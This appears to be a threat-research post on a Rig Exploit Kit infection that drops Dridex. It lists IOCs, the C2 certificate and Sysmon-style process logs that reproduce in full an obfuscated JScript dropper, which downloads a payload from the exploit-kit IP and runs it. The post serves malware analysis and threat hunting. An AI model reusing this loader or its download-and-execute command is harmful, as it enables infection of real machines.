Rig Exploit Kit delivers Dridex

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2020-01-30-Rig-EK-Dridex.zip

 

ASSOCIATED DOMAINS:

185.220.35.26 – gettime.xyz GET /selfali?cpm_id=114467297 – REDIRECT TO RIG EK
185.200.241.26 – RIG EXPLOIT KIT
88.217.172.65 – Port 443 – DRIDEX C2

IMAGES AND DETAILS:

Shown above: Network traffic associated with Rig Exploit Kit and Dridex C2

Shown above: SSL certificate used by Dridex to communicate with the command and control (C2)

Dridex Certificate:
Certificate (id-at-commonName=Stherchagri.jetzt,id-at-organizationName=Omsut GMK,id-at-localityName=Kathmandu,id-at-countryName=NP)

 

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

Image C:\Windows\System32\cmd.exe
CommandLine cMd.exe /q /c cd /d “%%temp%%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx” “¤”
CurrentDirectory C:\Users\John\Desktop\
User John-PC\John
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe”

Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx” “¤”
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cMd.exe /q /c cd /d “%temp%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx”

Image C:\Windows\System32\wscript.exe
User John-PC\John
Protocol tcp
SourceIp 192.168.4.134
DestinationIp 185.200.241.26
DestinationHostname
DestinationPort 80
DestinationPortName http

Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c radBD8F2.tmp.exe
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx”

Image C:\Users\John\AppData\Local\Temp\radBD8F2.tmp.exe
FileVersion 2.0.6.0
Description ?
Product ?
Company TechSmith Corporation
CommandLine radBD8F2.tmp.exe
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
MALWARE Hashes MD5=B9C33BC3F479CD9E20A95C0D1A177A98,SHA256=3EF308DF2DAB51E8FAC7160705505F3EB0F6A32313456E1380A3B8696E741714
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c radBD8F2.tmp.exe

Image C:\Users\John\AppData\Local\Temp\radBD8F2.tmp.exe
User John-PC\John
Protocol tcp
SourceIp 192.168.4.134
DestinationIp 88.217.172.65
DestinationHostname
DestinationPort 443
DestinationPortName https